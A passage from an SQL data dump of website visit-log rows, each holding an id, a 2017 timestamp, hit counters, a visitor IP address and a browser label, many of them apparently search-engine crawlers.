1,1,0,0,'95.108.181.52','other'),(142380,1502094792,1,1,0,0,'204.79.180.16','msie'),(142381,1502094964,1,1,0,0,'137.74.207.120','other'),(142382,1502094976,1,1,0,0,'91.209.11.236','other'),(142383,1502095135,1,1,0,0,'51.255.65.80','other'),(142384,1502095137,1,1,0,0,'5.45.207.56','other'),(142385,1502095163,2,2,0,0,'91.196.178.71','chrome'),(142386,1502095203,1,0,1,0,'66.249.66.155',''),(142387,1502095349,1,1,0,0,'173.208.173.138','other'),(142388,1502095359,1,1,0,0,'178.154.171.42','other'),(142389,1502095411,2,2,0,0,'95.158.3.62','chrome'),(142390,1502095611,1,1,0,0,'51.255.71.131','other'),(142391,1502095637,1,1,0,0,'51.255.65.63','other'),(142392,1502095913,1,1,0,0,'91.196.177.46','firefox'),(142393,1502095996,1,1,0,0,'37.54.18.166','chrome'),(142394,1502096066,1,1,0,0,'213.180.203.43','other'),(142395,1502096111,1,1,0,0,'178.154.171.53','other'),(142396,1502096114,1,1,0,0,'91.196.178.71','chrome'),(142397,1502096118,1,1,0,0,'213.180.203.25','other'),(142398,1502096124,1,1,0,0,'178.154.171.72','other'),(142399,1502096537,2,2,0,0,'91.196.178.69','chrome'),(142400,1502096702,2,2,0,0,'216.244.66.246','other'),(142401,1502096863,1,1,0,0,'137.74.207.109','other'),(142402,1502096897,1,1,0,0,'37.9.113.138','other'),(142403,1502097045,1,0,1,0,'66.249.66.157',''),(142404,1502097093,1,1,0,0,'81.162.238.73','chrome'),(142405,1502097447,1,1,0,0,'178.90.227.216','chrome'),(142406,1502097705,6,6,0,0,'216.244.66.194','other'),(142407,1502097738,1,1,0,0,'8.29.198.27','other'),(142408,1502097784,1,1,0,0,'217.182.132.54','other'),(142409,1502097986,1,1,0,0,'130.180.217.177','firefox'),(142410,1502098088,1,1,0,0,'51.255.64.106','other'),(142411,1502098219,1,1,0,0,'46.175.145.40','chrome'),(142412,1502098224,1,1,0,0,'78.152.161.14','chrome'),(142413,1502098303,1,1,0,0,'95.108.181.57','other'),(142414,1502099189,1,1,0,0,'164.132.162.164','other'),(142415,1502099232,1,1,0,0,'46.201.175.91','firefox'),(142416,1502099266,1,1,0,0,'217.182.132.62','other'),(142417,1502099326,1,1,0,0,'217.69.133.6','other'),(142418,1502099475,1,1,0,0,'51.255.65.72','other'),(142419,1502099497,1,1,0,0,'163.172.251.217','chrome'),(142420,1502099835,1,1,0,0,'51.255.65.97','other'),(142421,1502100224,1,1,0,0,'217.182.132.193','other'),(142422,1502100247,1,1,0,0,'51.255.65.16','other'),(142423,1502100287,1,1,0,0,'37.54.98.217','chrome'),(142424,1502100301,1,1,0,0,'66.249.93.93','chrome'),(142425,1502100338,1,1,0,0,'207.46.13.99','other'),(142426,1502100379,1,1,0,0,'180.76.15.22','other'),(142427,1502100624,1,1,0,0,'217.182.132.177','other'),(142428,1502100776,1,0,1,0,'66.249.66.155',''),(142429,1502100827,1,1,0,0,'91.196.178.161','chrome'),(142430,1502100831,4,4,0,0,'216.244.66.246','other'),(142431,1502101083,1,0,1,0,'66.249.66.157',''),(142432,1502101244,1,1,0,0,'51.255.71.117','other'),(142433,1502101427,1,1,0,0,'217.182.132.173','other'),(142434,1502101596,1,1,0,0,'217.182.132.156','other'),(142435,1502101911,1,1,0,0,'217.182.132.151','other'),(142436,1502102077,1,1,0,0,'37.9.113.128','other'),(142437,1502102275,1,1,0,0,'217.182.132.35','other'),(142438,1502103076,1,1,0,0,'51.255.65.82','other'),(142439,1502103193,1,1,0,0,'217.69.133.4','other'),(142440,1502103345,1,1,0,0,'217.182.132.24','other'),(142441,1502103689,1,1,0,0,'217.182.132.58','other'),(142442,1502103925,1,1,0,0,'5.45.207.56','other'),(142443,1502104119,1,1,0,0,'35.184.189.105','other'),(142444,1502104374,1,1,0,0,'51.255.65.87','other'),(142445,1502104474,1,1,0,0,'91.196.178.71','chrome'),(142446,1502104663,1,1,0,0,'178.154.171.53','other'),(142447,1502104722,1,1,0,0,'213.180.203.25','other'),(142448,1502104726,1,1,0,0,'5.45.207.64','other'),(142449,1502104917,1,1,0,0,'217.182.132.29','other'),(142450,1502104918,1,1,0,0,'37.9.113.94','other'),(142451,1502104923,1,1,0,0,'37.9.113.128','other'),(142452,1502105020,1,1,0,0,'185.158.116.161','firefox'),(142453,1502105021,1,0,1,0,'68.180.229.59',''),(142454,1502105081,1,0,1,0,'66.249.66.156',''),(142455,1502105647,1,1,0,0,'95.108.181.52','other'),(142456,1502106033,6,6,0,0,'216.244.66.246','other'),(142457,1502106195,1,1,0,0,'91.196.178.68','firefox'),(142458,1502106364,1,1,0,0,'213.180.203.32','other'),(142459,1502106404,1,1,0,0,'217.182.132.7','other'),(142460,1502106462,1,1,0,0,'91.196.178.69','chrome'),(142461,1502107193,1,1,0,0,'217.182.132.55','other'),(142462,1502107224,1,1,0,0,'95.108.181.69','other'),(142463,1502107391,1,1,0,0,'213.180.203.32','other'),(142464,1502107748,1,1,0,0,'91.209.11.236','other'),(142465,1502107826,1,1,0,0,'95.108.181.57','other'),(142466,1502108569,1,1,0,0,'8.29.198.25','other'),(142467,1502108607,5,5,0,0,'216.244.66.194','other'),(142468,1502108822,1,1,0,0,'216.244.66.246','other'),(142469,1502108872,1,1,0,0,'95.108.181.69','other'),(142470,1502108894,1,1,0,0,'178.154.171.53','other'),(142471,1502109166,1,1,0,0,'51.255.65.37','other'),(142472,1502109210,1,1,0,0,'95.108.181.63','other'),(142473,1502109352,1,1,0,0,'46.201.81.127','chrome'),(142474,1502109464,1,1,0,0,'91.196.178.69','chrome'),(142475,1502109635,1,1,0,0,'216.244.66.237','other'),(142476,1502109745,1,1,0,0,'137.74.207.114','other'),(142477,1502109801,1,1,0,0,'178.154.171.59','other'),(142478,1502110260,1,1,0,0,'217.182.132.181','other'),(142479,1502110400,1,1,0,0,'217.182.132.157','other'),(142480,1502110585,1,1,0,0,'178.154.171.42','other'),(142481,1502110783,7,7,0,0,'216.244.66.246','other'),(142482,1502111139,1,1,0,0,'173.208.173.138','other'),(142483,1502111511,1,1,0,0,'178.154.171.45','other'),(142484,1502112251,2,2,0,0,'141.8.142.20','other'),(142485,1502112255,1,1,0,0,'5.45.207.64','other'),(142486,1502112424,1,1,0,0,'216.244.66.194','other'),(142487,1502112426,1,1,0,0,'217.182.132.31','other'),(142488,1502112704,1,0,1,0,'66.249.66.155',''),(142489,1502113042,1,0,1,0,'66.249.66.74',''),(142490,1502113132,1,1,0,0,'91.124.199.100','chrome'),(142491,1502113918,1,1,0,0,'91.196.178.71','chrome'),(142492,1502114374,1,1,0,0,'46.200.122.53','firefox'),(142493,1502114578,1,1,0,0,'164.132.162.187','other'),(142494,1502114630,1,1,0,0,'217.69.133.2','other'),(142495,1502114632,1,1,0,0,'217.69.133.9','other'),(142496,1502114794,1,1,0,0,'185.137.18.35','chrome'),(142497,1502114883,1,1,0,0,'185.137.18.217','chrome'),(142498,1502114886,1,0,1,0,'66.249.66.157',''),(142499,1502115007,1,1,0,0,'37.9.113.94','other'),(142500,1502115708,1,1,0,0,'157.55.39.205','other'),(142501,1502115769,4,4,0,0,'216.244.66.194','other'),(142502,1502115976,1,1,0,0,'217.182.132.65','other'),(142503,1502116603,1,1,0,0,'51.255.65.97','other'),(142504,1502116630,1,1,0,0,'37.54.93.173','chrome'),(142505,1502116932,1,1,0,0,'51.255.71.123','other'),(142506,1502117284,1,1,0,0,'51.255.65.72','other'),(142507,1502117472,1,1,0,0,'5.255.253.4','other'),(142508,1502117508,1,1,0,0,'217.182.132.59','other'),(142509,1502117682,1,1,0,0,'217.182.132.190','other'),(142510,1502117702,1,0,1,0,'66.249.66.155',''),(142511,1502117756,1,1,0,0,'141.8.142.20','other'),(142512,1502117804,1,1,0,0,'51.255.65.27','other'),(142513,1502117920,1,1,0,0,'51.255.65.38','other'),(142514,1502117950,1,1,0,0,'213.186.202.92','firefox'),(142515,1502118832,1,1,0,0,'66.23.232.51','firefox'),(142516,1502118862,1,1,0,0,'193.200.212.133','chrome'),(142517,1502119129,1,1,0,0,'51.255.65.24','other'),(142518,1502119179,1,1,0,0,'137.74.207.161','other'),(142519,1502119333,1,1,0,0,'217.69.133.3','other'),(142520,1502119394,5,5,0,0,'216.244.66.246','other'),(142521,1502119403,1,1,0,0,'8.29.198.27','other'),(142522,1502119599,2,2,0,0,'91.209.11.236','other'),(142523,1502119659,1,1,0,0,'213.180.203.32','other'),(142524,1502119704,3,3,0,0,'216.244.66.194','other'),(142525,1502119796,1,1,0,0,'95.108.181.58','other'),(142526,1502119833,1,1,0,0,'66.249.66.157','chrome'),(142527,1502120634,1,1,0,0,'213.180.203.32','other'),(142528,1502120822,1,1,0,0,'217.182.132.52','other'),(142529,1502120830,1,1,0,0,'204.79.180.1','msie'),(142530,1502121413,1,1,0,0,'141.8.142.106','other'),(142531,1502121417,1,1,0,0,'95.108.181.63','other'),(142532,1502121497,1,1,0,0,'216.244.66.246','other'),(142533,1502121651,1,1,0,0,'217.182.132.61','other'),(142534,1502121828,1,1,0,0,'217.182.132.37','other'),(142535,1502121893,2,2,0,0,'213.180.203.32','other'),(142536,1502121916,1,1,0,0,'217.182.132.73','other'),(142537,1502121917,1,1,0,0,'217.182.132.74','other'),(142538,1502122170,1,1,0,0,'51.255.71.113','other'),(142539,1502122231,1,1,0,0,'217.182.132.60','other'),(142540,1502122317,1,1,0,0,'5.45.207.64','other'),(142541,1502122432,1,1,0,0,'217.182.132.171','other'),(142542,1502122509,1,1,0,0,'95.108.181.58','other'),(142543,1502122847,1,1,0,0,'92.112.248.30','chrome'),(142544,1502123086,1,1,0,0,'213.180.203.32','other'),(142545,1502123091,4,4,0,0,'216.244.66.194','other'),(142546,1502123271,1,1,0,0,'164.132.162.188','other'),(142547,1502123354,1,1,0,0,'95.108.181.63','other'),(142548,1502123705,1,1,0,0,'217.182.132.20','other'),(142549,1502123713,1,1,0,0,'51.255.71.101','other'),(142550,1502123925,1,1,0,0,'163.172.251.217','chrome'),(142551,1502124070,1,1,0,0,'195.10.210.49','chrome'),(142552,1502124138,1,0,1,0,'66.249.66.155',''),(142553,1502124630,1,0,1,0,'66.249.66.75',''),(142554,1502124637,1,1,0,0,'217.182.132.66','other'),(142555,1502124789,1,1,0,0,'51.255.65.36','other'),(142556,1502124854,1,1,0,0,'51.255.65.55','other'),(142557,1502124952,1,1,0,0,'51.255.71.123','other'),(142558,1502125010,1,1,0,0,'51.255.65.32','other'),(142559,1502125018,1,1,0,0,'216.244.66.237','other'),(142560,1502125367,1,1,0,0,'37.9.113.94','other'),(142561,1502125563,1,1,0,0,'217.182.132.90','other'),(142562,1502125790,1,1,0,0,'66.249.66.156','chrome'),(142563,1502126026,1,1,0,0,'217.69.133.9','other'),(142564,1502126028,1,1,0,0,'217.69.133.4','other'),(142565,1502126276,1,1,0,0,'217.182.132.79','other'),(142566,1502126369,1,1,0,0,'91.196.178.164','chrome'),(142567,1502126778,1,1,0,0,'217.182.132.81','other'),(142568,1502126919,1,1,0,0,'91.196.178.67','chrome'),(142569,1502127003,1,1,0,0,'216.244.66.194','other'),(142570,1502127386,1,1,0,0,'37.73.166.145','chrome'),(142571,1502127695,1,1,0,0,'217.182.132.58','other'),(142572,1502128033,2,2,0,0,'216.244.66.246','other'),(142573,1502128284,1,1,0,0,'213.180.203.14','other'),(142574,1502128328,1,1,0,0,'5.45.207.57','other'),(142575,1502128771,1,1,0,0,'51.255.65.70','other'),(142576,1502128991,1,0,1,0,'66.249.66.156',''),(142577,1502129129,3,3,0,0,'216.244.66.194','other'),(142578,1502129137,1,1,0,0,'51.255.71.111','other'),(142579,1502129158,1,1,0,0,'5.255.253.2','other'),(142580,1502129224,1,0,1,0,'68.180.229.59',''),(142581,1502129304,1,1,0,0,'37.73.166.145','chrome'),(142582,1502129348,1,1,0,0,'217.182.132.57','other'),(142583,1502129388,1,1,0,0,'37.9.113.78','other'),(142584,1502129549,1,1,0,0,'164.132.162.156','other'),(142585,1502129682,1,1,0,0,'51.255.65.47','other'),(142586,1502129778,1,1,0,0,'95.108.181.69','other'),(142587,1502130087,1,1,0,0,'137.74.207.164','other'),(142588,1502130234,1,1,0,0,'8.29.198.25','other'),(142589,1502130374,1,1,0,0,'178.154.171.59','other'),(142590,1502130427,1,1,0,0,'216.244.66.246','other'),(142591,1502130467,4,4,0,0,'216.244.66.194','other'),(142592,1502130525,1,1,0,0,'217.182.132.73','other'),(142593,1502131039,1,1,0,0,'37.9.113.78','other'),(142594,1502131251,1,1,0,0,'95.108.181.52','other'),(142595,1502131255,1,1,0,0,'95.108.181.57','other'),(142596,1502131545,1,1,0,0,'137.74.207.110','other'),(142597,1502131555,2,0,2,0,'66.249.66.156',''),(142598,1502131591,1,1,0,0,'51.255.65.16','other'),(142599,1502131681,1,1,0,0,'217.69.133.5','other'),(142600,1502131720,1,1,0,0,'207.46.13.109','other'),(142601,1502132055,1,1,0,0,'164.132.162.160','other'),(142602,1502132135,1,1,0,0,'51.255.71.100','other'),(142603,1502132271,1,1,0,0,'66.249.66.156','chrome'),(142604,1502132309,1,1,0,0,'180.76.15.137','other'),(142605,1502132728,1,1,0,0,'5.255.253.2','other'),(142606,1502133083,7,7,0,0,'216.244.66.246','other'),(142607,1502133122,1,0,1,0,'66.249.66.75',''),(142608,1502133146,1,1,0,0,'217.69.133.6','other'),(142609,1502133253,1,0,1,0,'66.249.66.155',''),(142610,1502133716,1,1,0,0,'178.137.215.231','chrome'),(142611,1502133810,1,1,0,0,'66.249.66.74','chrome'),(142612,1502134195,1,1,0,0,'66.249.66.76','chrome'),(142613,1502134416,1,1,0,0,'92.112.248.30','chrome'),(142614,1502134504,1,1,0,0,'207.46.13.109','other'),(142615,1502134536,1,1,0,0,'66.249.66.155','chrome'),(142616,1502134558,1,1,0,0,'178.154.171.53','other'),(142617,1502134710,1,1,0,0,'95.108.181.63','other'),(142618,1502135130,1,1,0,0,'95.108.181.78','other'),(142619,1502135231,1,1,0,0,'37.9.113.138','other'),(142620,1502135330,1,1,0,0,'51.255.65.79','other'),(142621,1502135366,1,1,0,0,'178.154.200.7','other'),(142622,1502135861,1,1,0,0,'66.249.66.157','chrome'),(142623,1502136089,1,1,0,0,'91.209.11.236','other'),(142624,1502136197,2,0,2,0,'66.249.66.155',''),(142625,1502136288,2,2,0,0,'217.69.133.6','other'),(142626,1502136402,3,3,0,0,'216.244.66.194','other'),(142627,1502136718,1,1,0,0,'95.108.181.69','other'),(142628,1502136748,1,1,0,0,'95.108.181.63','other'),(142629,1502136796,1,1,0,0,'51.255.65.77','other'),(142630,1502137205,2,2,0,0,'178.154.171.3','other'),(142631,1502137468,2,0,2,0,'66.249.66.157',''),(142632,1502137487,1,1,0,0,'5.255.253.1','other'),(142633,1502137508,1,1,0,0,'207.46.13.109','other'),(142634,1502137963,1,0,1,0,'66.249.66.76',''),(142635,1502138005,1,1,0,0,'37.9.113.128','other'),(142636,1502138440,1,1,0,0,'180.76.15.144','other'),(142637,1502138771,1,1,0,0,'37.9.113.94','other'),(142638,1502139108,1,1,0,0,'37.146.183.138','msie'),(142639,1502139184,1,1,0,0,'51.255.65.27','other'),(142640,1502139266,5,5,0,0,'216.244.66.246','other'),(142641,1502139309,1,0,1,0,'66.249.66.75',''),(142642,1502139743,1,1,0,0,'37.9.113.128','other'),(142643,1502140050,1,0,1,0,'66.249.66.155',''),(142644,1502140172,2,0,2,0,'66.249.66.76',''),(142645,1502140176,1,1,0,0,'95.108.181.58','other'),(142646,1502140196,1,1,0,0,'91.209.11.236','other'),(142647,1502140458,1,1,0,0,'157.55.39.205','other'),(142648,1502140469,3,3,0,0,'216.244.66.194','other'),(142649,1502140812,1,0,1,0,'66.249.66.75',''),(142650,1502140874,1,1,0,0,'51.255.71.101','other'),(142651,1502140883,1,1,0,0,'217.182.132.174','other'),(142652,1502141075,1,1,0,0,'8.29.198.27','other'),(142653,1502141233,1,1,0,0,'91.209.11.236','other'),(142654,1502141619,1,1,0,0,'51.255.65.53','other'),(142655,1502141937,1,1,0,0,'217.69.133.2','other'),(142656,1502142060,1,1,0,0,'217.182.132.192','other'),(142657,1502142095,1,1,0,0,'95.108.181.63','other'),(142658,1502142418,1,1,0,0,'217.182.132.188','other'),(142659,1502142481,1,0,1,0,'66.249.66.75',''),(142660,1502142856,1,1,0,0,'37.9.113.78','other'),(142661,1502143003,1,1,0,0,'163.172.251.217','chrome'),(142662,1502143083,1,1,0,0,'217.182.132.175','other'),(142663,1502143105,1,0,1,0,'66.249.66.155',''),(142664,1502143273,1,1,0,0,'51.255.65.74','other'),(142665,1502143383,1,1,0,0,'37.9.113.138','other'),(142666,1502143414,1,0,1,0,'66.249.66.157',''),(142667,1502143752,2,2,0,0,'216.244.66.246','other'),(142668,1502143809,3,3,0,0,'216.244.66.194','other'),(142669,1502143812,1,1,0,0,'5.45.207.57','other'),(142670,1502144022,2,0,2,0,'66.249.66.74',''),(142671,1502144148,1,0,1,0,'66.249.66.76',''),(142672,1502144808,1,1,0,0,'51.255.65.47','other'),(142673,1502144904,1,1,0,0,'217.182.132.182','other'),(142674,1502144967,1,1,0,0,'66.249.66.75','chrome'),(142675,1502145039,1,0,1,0,'66.249.66.155',''),(142676,1502145169,1,1,0,0,'217.182.132.174','other'),(142677,1502145413,1,1,0,0,'217.182.132.5','other'),(142678,1502145454,1,1,0,0,'5.45.207.57','other'),(142679,1502145639,1,0,1,0,'66.249.66.157',''),(142680,1502145892,1,1,0,0,'51.255.71.126','other'),(142681,1502146007,1,1,0,0,'51.255.65.48','other'),(142682,1502146073,1,1,0,0,'95.108.181.52','other'),(142683,1502146403,1,1,0,0,'51.255.65.96','other'),(142684,1502147045,1,1,0,0,'95.108.181.58','other'),(142685,1502147350,1,1,0,0,'213.180.203.14','other'),(142686,1502147352,1,1,0,0,'51.255.65.43','other'),(142687,1502147792,3,3,0,0,'216.244.66.194','other'),(142688,1502148408,1,0,1,0,'66.249.66.75',''),(142689,1502148687,1,1,0,0,'217.69.133.4','other'),(142690,1502149387,2,2,0,0,'91.209.11.236','other'),(142691,1502149617,1,1,0,0,'217.182.132.77','other'),(142692,1502149781,1,0,1,0,'66.249.66.75',''),(142693,1502149817,1,1,0,0,'178.154.171.53','other'),(142694,1502150017,1,1,0,0,'217.69.133.2','other'),(142695,1502150379,3,3,0,0,'216.244.66.246','other'),(142696,1502150413,1,1,0,0,'157.55.39.205','other'),(142697,1502150662,1,1,0,0,'137.74.207.188','other'),(142698,1502150665,1,1,0,0,'217.182.132.152','other'),(142699,1502150709,1,1,0,0,'217.182.132.173','other'),(142700,1502150751,1,1,0,0,'207.46.13.99','other'),(142701,1502151202,3,3,0,0,'216.244.66.194','other'),(142702,1502151740,1,1,0,0,'37.115.196.168','firefox'),(142703,1502151830,2,2,0,0,'217.182.132.175','other'),(142704,1502151911,1,1,0,0,'8.29.198.27','other'),(142705,1502151936,1,1,0,0,'66.249.66.156','chrome'),(142706,1502152338,1,0,1,0,'66.249.66.76',''),(142707,1502152708,1,1,0,0,'5.255.253.4','other'),(142708,1502152978,1,1,0,0,'178.154.200.36','other'),(142709,1502152982,1,1,0,0,'95.108.181.52','other'),(142710,1502153113,1,1,0,0,'164.132.162.154','other'),(142711,1502153216,1,1,0,0,'91.209.11.236','other'),(142712,1502153572,1,1,0,0,'5.45.207.66','other'),(142713,1502153754,1,1,0,0,'217.182.132.96','other'),(142714,1502153888,1,1,0,0,'178.154.200.7','other'),(142715,1502154147,1,1,0,0,'95.108.181.63','other'),(142716,1502154192,5,5,0,0,'216.244.66.246','other'),(142717,1502154607,1,1,0,0,'82.211.55.21','chrome'),(142718,1502154725,1,1,0,0,'37.9.113.128','other'),(142719,1502155083,1,1,0,0,'217.182.132.154','other'),(142720,1502155134,3,3,0,0,'216.244.66.194','other'),(142721,1502155227,1,1,0,0,'51.255.71.118','other'),(142722,1502155351,1,0,1,0,'66.249.66.155',''),(142723,1502155636,1,1,0,0,'217.69.133.203','other'),(142724,1502156501,1,1,0,0,'95.108.181.58','other'),(142725,1502156829,1,1,0,0,'217.182.132.17','other'),(142726,1502156862,1,0,1,0,'66.249.66.155',''),(142727,1502157407,1,1,0,0,'217.182.132.33','other'),(142728,1502157606,1,0,1,0,'66.249.66.75',''),(142729,1502157834,1,1,0,0,'5.255.253.4','other'),(142730,1502157876,1,1,0,0,'51.255.65.23','other'),(142731,1502158106,1,1,0,0,'51.255.65.78','other'),(142732,1502158143,3,3,0,0,'91.209.11.236','other'),(142733,1502158165,1,1,0,0,'51.255.71.125','other'),(142734,1502158181,1,1,0,0,'217.182.132.155','other'),(142735,1502158526,1,1,0,0,'217.182.132.14','other'),(142736,1502158695,1,1,0,0,'178.154.171.3','other'),(142737,1502158749,1,1,0,0,'95.108.181.52','other'),(142738,1502158930,1,1,0,0,'217.69.133.3','other'),(142739,1502158946,1,1,0,0,'95.108.181.63','other'),(142740,1502159141,1,1,0,0,'51.255.65.96','other'),(142741,1502159194,1,1,0,0,'37.9.113.128','other'),(142742,1502159205,1,0,1,0,'66.249.66.157',''),(142743,1502159272,1,1,0,0,'164.132.162.155','other'),(142744,1502159505,1,1,0,0,'5.255.253.1','other'),(142745,1502159825,1,1,0,0,'66.249.66.155','chrome'),(142746,1502160407,1,0,1,0,'66.249.66.75',''),(142747,1502160801,1,1,0,0,'213.180.203.43','other'),(142748,1502160808,1,1,0,0,'217.182.132.61','other'),(142749,1502161041,1,1,0,0,'217.182.132.184','other'),(142750,1502161573,1,1,0,0,'157.55.39.153','other'),(142751,1502161658,1,1,0,0,'217.182.132.20','other'),(142752,1502161799,1,1,0,0,'207.46.13.109','other'),(142753,1502161999,1,0,1,0,'66.249.66.155',''),(142754,1502162151,1,1,0,0,'216.244.66.246','other'),(142755,1502162501,3,3,0,0,'216.244.66.194','other'),(142756,1502162652,1,1,0,0,'51.255.65.6','other'),(142757,1502162751,1,1,0,0,'8.29.198.25','other'),(142758,1502163158,9,9,0,0,'216.244.66.246','other'),(142759,1502163283,1,1,0,0,'217.182.132.147','other'),(142760,1502163494,1,0,1,0,'66.249.66.76',''),(142761,1502163745,1,1,0,0,'95.108.181.58','other'),(142762,1502163821,1,1,0,0,'5.255.253.4','other'),(142763,1502164217,1,1,0,0,'178.137.215.231','chrome'),(142764,1502164220,1,1,0,0,'51.255.65.84','other'),(142765,1502164922,1,1,0,0,'51.255.65.34','other'),(142766,1502164959,1,1,0,0,'51.255.65.42','other'),(142767,1502165376,1,1,0,0,'178.137.215.231','other'),(142768,1502165533,1,0,1,0,'66.249.66.75',''),(142769,1502166132,1,1,0,0,'178.154.171.59','other'),(142770,1502166582,1,1,0,0,'37.9.113.94','other'),(142771,1502166893,1,1,0,0,'217.69.133.3','other'),(142772,1502167303,1,1,0,0,'91.196.178.65','firefox'),(142773,1502167809,1,1,0,0,'217.182.132.172','other'),(142774,1502168302,1,1,0,0,'5.255.253.2','other'),(142775,1502168613,1,1,0,0,'217.182.132.154','other'),(142776,1502168827,1,1,0,0,'178.154.200.36','other'),(142777,1502169106,1,1,0,0,'178.154.171.59','other'),(142778,1502169127,1,1,0,0,'51.255.65.60','other'),(142779,1502169687,1,1,0,0,'217.182.132.33','other'),(142780,1502170154,1,1,0,0,'95.108.181.92','other'),(142781,1502170379,1,1,0,0,'51.255.65.55','other'),(142782,1502170389,1,1,0,0,'95.108.181.58','other'),(142783,1502170393,2,0,2,0,'66.249.66.74',''),(142784,1502170458,1,1,0,0,'137.74.207.161','other'),(142785,1502170494,1,1,0,0,'51.255.71.101','other'),(142786,1502170537,1,1,0,0,'51.255.65.46','other'),(142787,1502170594,1,1,0,0,'217.182.132.82','other'),(142788,1502170603,1,1,0,0,'178.154.171.3','other'),(142789,1502170607,1,1,0,0,'213.180.203.42','other'),(142790,1502170761,1,1,0,0,'5.45.207.56','other'),(142791,1502171072,1,0,1,0,'66.249.66.157',''),(142792,1502171177,2,2,0,0,'91.196.178.69','chrome'),(142793,1502171296,1,1,0,0,'51.255.65.38','other'),(142794,1502171644,1,1,0,0,'37.73.163.250','chrome'),(142795,1502171770,1,1,0,0,'91.196.178.164','chrome'),(142796,1502171910,1,1,0,0,'193.200.212.133','chrome'),(142797,1502172175,3,3,0,0,'216.244.66.246','other'),(142798,1502172531,1,1,0,0,'91.196.178.69','chrome'),(142799,1502172726,1,1,0,0,'37.73.163.250','chrome'),(142800,1502173003,1,1,0,0,'66.249.66.74','chrome'),(142801,1502173229,9,9,0,0,'216.244.66.194','other'),(142802,1502173346,1,1,0,0,'217.182.132.170','other'),(142803,1502173584,1,1,0,0,'8.29.198.25','other'),(142804,1502173712,1,1,0,0,'95.108.181.69','other'),(142805,1502173802,1,0,1,0,'66.249.66.156',''),(142806,1502174064,1,1,0,0,'51.255.65.79','other'),(142807,1502174660,1,1,0,0,'5.255.253.4','other'),(142808,1502174664,1,1,0,0,'37.9.113.78','other'),(142809,1502175024,1,1,0,0,'217.182.132.5','other'),(142810,1502175085,1,1,0,0,'66.249.66.157','chrome'),(142811,1502175485,1,1,0,0,'207.46.13.99','other'),(142812,1502175594,1,1,0,0,'51.255.65.59','other'),(142813,1502175654,2,2,0,0,'216.244.66.246','other'),(142814,1502175895,1,1,0,0,'217.182.132.81','other'),(142815,1502176215,1,1,0,0,'217.182.132.37','other'),(142816,1502176252,2,2,0,0,'95.108.181.52','other'),(142817,1502176286,1,1,0,0,'37.9.113.128','other'),(142818,1502176326,1,1,0,0,'217.182.132.4','other'),(142819,1502177078,1,1,0,0,'217.69.133.3','other'),(142820,1502177295,1,1,0,0,'217.182.132.191','other'),(142821,1502177506,1,1,0,0,'217.182.132.82','other'),(142822,1502177515,1,1,0,0,'178.154.171.53','other'),(142823,1502177799,1,1,0,0,'91.196.178.69','chrome'),(142824,1502177806,1,1,0,0,'51.255.71.116','other'),(142825,1502178062,1,1,0,0,'178.154.200.7','other'),(142826,1502178375,1,1,0,0,'51.255.71.118','other'),(142827,1502178416,1,0,1,0,'66.249.66.76',''),(142828,1502178707,1,1,0,0,'217.182.132.18','other'),(142829,1502178768,1,1,0,0,'217.182.132.7','other'),(142830,1502178812,2,2,0,0,'198.204.243.138','other'),(142831,1502179450,1,1,0,0,'178.154.171.3','other'),(142832,1502180523,9,9,0,0,'216.244.66.194','other'),(142833,1502180544,3,3,0,0,'91.196.178.71','chrome'),(142834,1502180886,1,1,0,0,'178.154.171.53','other'),(142835,1502181054,1,1,0,0,'46.201.175.91','firefox'),(142836,1502181120,1,1,0,0,'91.196.178.69','chrome'),(142837,1502181537,2,2,0,0,'178.92.85.164','chrome'),(142838,1502182153,1,1,0,0,'217.182.132.23','other'),(142839,1502182174,1,1,0,0,'78.111.190.127','firefox'),(142840,1502182284,1,1,0,0,'91.196.178.164','chrome'),(142841,1502182492,1,1,0,0,'5.255.253.1','other'),(142842,1502182503,1,1,0,0,'46.201.175.91','firefox'),(142843,1502182683,1,0,1,0,'66.249.66.75',''),(142844,1502182907,1,1,0,0,'37.54.18.242','chrome'),(142845,1502182948,1,1,0,0,'66.249.66.156','chrome'),(142846,1502183004,1,1,0,0,'195.10.210.49','chrome'),(142847,1502183011,1,1,0,0,'217.182.132.172','other'),(142848,1502183092,2,2,0,0,'216.244.66.246','other'),(142849,1502183198,1,1,0,0,'178.154.171.59','other'),(142850,1502183329,1,1,0,0,'91.196.178.69','chrome'),(142851,1502183429,1,0,1,0,'66.249.66.74',''),(142852,1502183572,1,1,0,0,'217.182.132.187','other'),(142853,1502183884,1,1,0,0,'95.108.181.58','other'),(142854,1502183956,1,1,0,0,'164.132.162.188','other'),(142855,1502184149,1,1,0,0,'217.182.132.184','other'),(142856,1502184186,1,1,0,0,'178.137.215.231','firefox'),(142857,1502184343,1,0,1,0,'66.249.66.155',''),(142858,1502184413,1,1,0,0,'8.29.198.27','other'),(142859,1502184505,1,1,0,0,'5.255.253.2','other'),(142860,1502184636,1,1,0,0,'51.255.71.131','other'),(142861,1502185016,1,1,0,0,'46.201.175.91','firefox'),(142862,1502185064,1,1,0,0,'37.9.113.128','other'),(142863,1502185364,1,1,0,0,'51.255.71.122','other'),(142864,1502185405,1,1,0,0,'51.255.65.81','other'),(142865,1502185475,1,1,0,0,'178.154.171.3','other'),(142866,1502185582,1,1,0,0,'5.255.253.4','other'),(142867,1502185592,2,0,2,0,'66.249.66.156',''),(142868,1502185834,1,1,0,0,'217.182.132.35','other'),(142869,1502185972,1,1,0,0,'51.255.65.17','other'),(142870,1502186114,1,1,0,0,'178.154.171.53','other'),(142871,1502186569,1,1,0,0,'46.201.175.91','firefox'),(142872,1502186775,1,1,0,0,'51.255.71.115','other'),(142873,1502186817,1,1,0,0,'66.249.66.156','chrome'),(142874,1502187552,1,1,0,0,'66.249.66.75','chrome'),(142875,1502187793,1,1,0,0,'213.180.203.32','other'),(142876,1502187975,1,1,0,0,'51.255.65.77','other'),(142877,1502188002,1,1,0,0,'91.196.178.164','chrome'),(142878,1502188016,1,1,0,0,'217.182.132.22','other'),(142879,1502188105,1,0,1,0,'66.249.66.76',''),(142880,1502188174,3,3,0,0,'216.244.66.246','other'),(142881,1502188389,1,1,0,0,'217.69.133.5','other'),(142882,1502188401,1,1,0,0,'51.255.65.90','other'),(142883,1502188522,1,1,0,0,'162.210.196.97','other'),(142884,1502188787,1,1,0,0,'213.180.203.14','other'),(142885,1502188817,1,1,0,0,'37.9.113.128','other'),(142886,1502188871,1,1,0,0,'91.219.223.196','chrome'),(142887,1502189055,1,1,0,0,'91.209.11.236','other'),(142888,1502189259,1,0,1,0,'66.249.66.157',''),(142889,1502189277,1,1,0,0,'66.249.66.156','chrome'),(142890,1502189324,1,1,0,0,'51.255.65.45','other'),(142891,1502189405,1,0,1,0,'66.249.66.76',''),(142892,1502189479,1,1,0,0